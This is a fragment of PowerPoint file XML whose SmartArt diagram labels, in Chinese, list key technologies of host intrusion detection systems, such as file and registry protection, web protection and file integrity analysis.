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9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9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7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide9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9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875" r:id="rId2"/>
    <p:sldId id="453" r:id="rId3"/>
    <p:sldId id="336" r:id="rId4"/>
    <p:sldId id="337" r:id="rId5"/>
    <p:sldId id="340" r:id="rId6"/>
    <p:sldId id="341" r:id="rId7"/>
    <p:sldId id="882" r:id="rId8"/>
    <p:sldId id="343" r:id="rId9"/>
    <p:sldId id="332" r:id="rId10"/>
    <p:sldId id="344" r:id="rId11"/>
    <p:sldId id="345" r:id="rId12"/>
    <p:sldId id="346" r:id="rId13"/>
    <p:sldId id="349" r:id="rId14"/>
    <p:sldId id="350" r:id="rId15"/>
    <p:sldId id="351" r:id="rId16"/>
    <p:sldId id="353" r:id="rId17"/>
    <p:sldId id="352" r:id="rId18"/>
    <p:sldId id="354" r:id="rId19"/>
    <p:sldId id="355" r:id="rId20"/>
    <p:sldId id="373" r:id="rId21"/>
    <p:sldId id="357" r:id="rId22"/>
    <p:sldId id="358" r:id="rId23"/>
    <p:sldId id="359" r:id="rId24"/>
    <p:sldId id="360" r:id="rId25"/>
    <p:sldId id="361" r:id="rId26"/>
    <p:sldId id="877" r:id="rId27"/>
    <p:sldId id="363" r:id="rId28"/>
    <p:sldId id="365" r:id="rId29"/>
    <p:sldId id="366" r:id="rId30"/>
    <p:sldId id="367" r:id="rId31"/>
    <p:sldId id="368" r:id="rId32"/>
    <p:sldId id="369" r:id="rId33"/>
    <p:sldId id="374" r:id="rId34"/>
    <p:sldId id="364" r:id="rId35"/>
    <p:sldId id="370" r:id="rId36"/>
    <p:sldId id="371" r:id="rId37"/>
    <p:sldId id="372" r:id="rId38"/>
    <p:sldId id="375" r:id="rId39"/>
    <p:sldId id="376" r:id="rId40"/>
    <p:sldId id="377" r:id="rId41"/>
    <p:sldId id="378" r:id="rId42"/>
    <p:sldId id="379" r:id="rId43"/>
    <p:sldId id="380" r:id="rId44"/>
    <p:sldId id="883" r:id="rId45"/>
    <p:sldId id="387" r:id="rId46"/>
    <p:sldId id="388" r:id="rId47"/>
    <p:sldId id="389" r:id="rId48"/>
    <p:sldId id="408" r:id="rId49"/>
    <p:sldId id="407" r:id="rId50"/>
    <p:sldId id="409" r:id="rId51"/>
    <p:sldId id="424" r:id="rId52"/>
    <p:sldId id="410" r:id="rId53"/>
    <p:sldId id="426" r:id="rId54"/>
    <p:sldId id="427" r:id="rId55"/>
    <p:sldId id="412" r:id="rId56"/>
    <p:sldId id="428" r:id="rId57"/>
    <p:sldId id="533" r:id="rId58"/>
    <p:sldId id="534" r:id="rId59"/>
    <p:sldId id="535" r:id="rId60"/>
    <p:sldId id="536" r:id="rId61"/>
    <p:sldId id="537" r:id="rId62"/>
    <p:sldId id="429" r:id="rId63"/>
    <p:sldId id="415" r:id="rId64"/>
    <p:sldId id="416" r:id="rId65"/>
    <p:sldId id="417" r:id="rId66"/>
    <p:sldId id="418" r:id="rId67"/>
    <p:sldId id="419" r:id="rId68"/>
    <p:sldId id="420" r:id="rId69"/>
    <p:sldId id="421" r:id="rId70"/>
    <p:sldId id="422" r:id="rId71"/>
    <p:sldId id="423" r:id="rId72"/>
    <p:sldId id="884" r:id="rId73"/>
    <p:sldId id="518" r:id="rId74"/>
    <p:sldId id="520" r:id="rId75"/>
    <p:sldId id="885" r:id="rId76"/>
    <p:sldId id="523" r:id="rId77"/>
    <p:sldId id="522" r:id="rId78"/>
    <p:sldId id="525" r:id="rId79"/>
    <p:sldId id="526" r:id="rId80"/>
    <p:sldId id="527" r:id="rId81"/>
    <p:sldId id="528" r:id="rId82"/>
    <p:sldId id="529" r:id="rId83"/>
    <p:sldId id="531" r:id="rId84"/>
    <p:sldId id="532" r:id="rId85"/>
    <p:sldId id="566" r:id="rId86"/>
    <p:sldId id="569" r:id="rId87"/>
    <p:sldId id="577" r:id="rId88"/>
    <p:sldId id="570" r:id="rId89"/>
    <p:sldId id="571" r:id="rId90"/>
    <p:sldId id="575" r:id="rId91"/>
    <p:sldId id="576" r:id="rId92"/>
    <p:sldId id="574" r:id="rId93"/>
    <p:sldId id="573" r:id="rId94"/>
    <p:sldId id="578" r:id="rId95"/>
    <p:sldId id="579" r:id="rId96"/>
    <p:sldId id="580" r:id="rId97"/>
    <p:sldId id="581" r:id="rId98"/>
    <p:sldId id="634"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0000FF"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="15449F"/>
    <a:srgbClr val="153B95"/>
    <a:srgbClr val="5B76B5"/>
    <a:srgbClr val="478CD1"/>
    <a:srgbClr val="6780BB"/>
    <a:srgbClr val="A5B3D6"/>
    <a:srgbClr val="99A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64" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="1158" y="9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5B8EA6C-8CE3-4AFB-B15B-3D6E6E3D9D97}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1#1" loCatId="hierarchy" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1#1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent0_1#1" csCatId="mainScheme" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>HIDS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2500" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>关键技术</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BCDD91C-BA81-4333-AA0D-7410EE0AA8A9}" type="parTrans" cxnId="{5D5EF503-5211-4038-A74C-8C27526566EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAF0FDAF-6EB7-4EEF-9672-58018CE1CDB0}" type="sibTrans" cxnId="{5D5EF503-5211-4038-A74C-8C27526566EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4F85FED-DC97-4A16-ADBA-01746117A53D}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>文件和注册表保护技术</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63E2A71E-CA7D-4817-8634-BB59BACAB105}" type="parTrans" cxnId="{46567ABB-DB8B-4C44-948F-5E844E0F61B3}">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458DEFDC-DDC3-462E-943B-1B859E8AEC04}" type="sibTrans" cxnId="{46567ABB-DB8B-4C44-948F-5E844E0F61B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4401475D-44F2-4BC0-93BA-42264B451FEE}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>网络安全</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>防护技术</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBF6043E-6380-404B-B97A-F45A60A017EF}" type="parTrans" cxnId="{3CA86B3E-5C4A-439C-8321-66BCE17E9B5E}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln w="50800">
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD13FD54-A0E0-4B11-AC18-3901602504E9}" type="sibTrans" cxnId="{3CA86B3E-5C4A-439C-8321-66BCE17E9B5E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78418E4E-C82C-438F-B343-E98ADCEAE396}">
      <dgm:prSet phldrT="[文本]" phldr="0" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr vert="horz" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>WEB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>保护</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>技术</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04CBB856-B280-45D9-B4FB-5581734C89BA}" type="parTrans" cxnId="{C61BB966-E119-4ACA-9207-B1C2206705B8}">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5366F848-6F6B-47C5-977C-263B52F6F640}" type="sibTrans" cxnId="{C61BB966-E119-4ACA-9207-B1C2206705B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07D4D0E0-A5C3-42B6-8A59-7F8661C7DAE3}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="006600"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>HTTP</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>请求类型</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9FA77E3-6B12-4D40-984F-BF328B133FA9}" type="parTrans" cxnId="{6A74F985-8DBA-4A51-BA07-5A24492A67D1}">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4009B584-75E6-4FD0-A10B-F28E8EFD412C}" type="sibTrans" cxnId="{6A74F985-8DBA-4A51-BA07-5A24492A67D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30B0A60E-67FC-4786-BE46-A37336F6C947}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="006600"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>缓冲区</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>溢出</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D338F324-7A69-47FF-8CDA-1EF0EE6D5686}" type="parTrans" cxnId="{292652D3-6565-4423-9AAD-439CAF041449}">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97CDD815-8815-4097-A9CA-319198749317}" type="sibTrans" cxnId="{292652D3-6565-4423-9AAD-439CAF041449}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E9E5DA5-D44C-4EDB-9723-A3C21B5744D4}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="006600"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>关键字</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7221AA30-A871-420D-8E2E-696DBE3DEB5F}" type="parTrans" cxnId="{90405A9F-3C2D-40CF-A1E2-9DD27ADD1340}">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189664AE-E2D9-48E3-A638-98D62EE6951D}" type="sibTrans" cxnId="{90405A9F-3C2D-40CF-A1E2-9DD27ADD1340}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AECDD98-5797-4A44-8C26-5DA0AAD5E5D9}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="006600"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>物理目录</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A238E1FB-F6E8-4403-978D-D3A6436872E5}" type="parTrans" cxnId="{4F05077D-6673-4B3B-86E1-FE75F1A034D8}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln w="50800">
          <a:solidFill>
            <a:srgbClr val="00330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791D72F5-9219-49E5-B8E8-A34244E3FAE4}" type="sibTrans" cxnId="{4F05077D-6673-4B3B-86E1-FE75F1A034D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83CEAF30-2A2E-4B49-8A2E-A96309B1F3FD}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>文件完整性分析技术</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F16A4F96-D9B6-43F0-A1B3-B978BB86476B}" type="parTrans" cxnId="{231B8356-5718-4BC2-ABCF-780B1E840884}">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solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BDEB7C2-4085-4463-878C-8223C18A9ED7}" type="sibTrans" cxnId="{231B8356-5718-4BC2-ABCF-780B1E840884}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1942F3CC-C71F-4237-8AC5-5EE7682A31ED}" type="pres">
      <dgm:prSet presAssocID="{C5B8EA6C-8CE3-4AFB-B15B-3D6E6E3D9D97}" presName="hierChild1" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{379E4451-41AB-4175-BA0D-3E79156AEF52}" type="pres">
      <dgm:prSet presAssocID="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" presName="hierRoot1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0683CC2-02F9-444E-8D39-14F616783710}" type="pres">
      <dgm:prSet presAssocID="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE13E43E-07CF-4376-8B9B-A6CD91B4ED42}" type="pres">
      <dgm:prSet presAssocID="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" presName="background" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{16FBB9D9-5389-4419-B3DA-B5F803EFAAC7}" type="pres">
      <dgm:prSet presAssocID="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" presName="text" presStyleLbl="fgAcc0" presStyleIdx="0" presStyleCnt="1" custScaleX="150350" custLinFactNeighborX="1662" custLinFactNeighborY="-55766">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{920F5DB0-D0A3-4531-BBE3-E9EF47AA0D0C}" type="pres">
      <dgm:prSet presAssocID="{4C08F03F-E496-45DE-BD41-EFBB13B813EE}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BFE71098-3182-402D-8CD3-1657F5586277}" type="pres">
